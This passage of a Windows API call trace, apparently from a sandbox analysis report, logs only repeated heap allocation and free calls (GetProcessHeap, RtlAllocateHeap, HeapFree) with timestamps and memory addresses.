lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.149] GetProcessHeap () returned 0x280000 [0058.149] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.150] GetProcessHeap () returned 0x280000 [0058.150] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.151] GetProcessHeap () returned 0x280000 [0058.151] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.152] GetProcessHeap () returned 0x280000 [0058.152] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.153] GetProcessHeap () returned 0x280000 [0058.153] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.153] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.154] GetProcessHeap () returned 0x280000 [0058.154] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.154] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.155] GetProcessHeap () returned 0x280000 [0058.155] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.155] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.156] GetProcessHeap () returned 0x280000 [0058.156] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.156] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.157] GetProcessHeap () returned 0x280000 [0058.157] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.157] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0058.158] GetProcessHeap () returned 0x280000 [0058.158] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.158] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0058.159] GetProcessHeap () returned 0x280000 [0058.159] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0058.159] 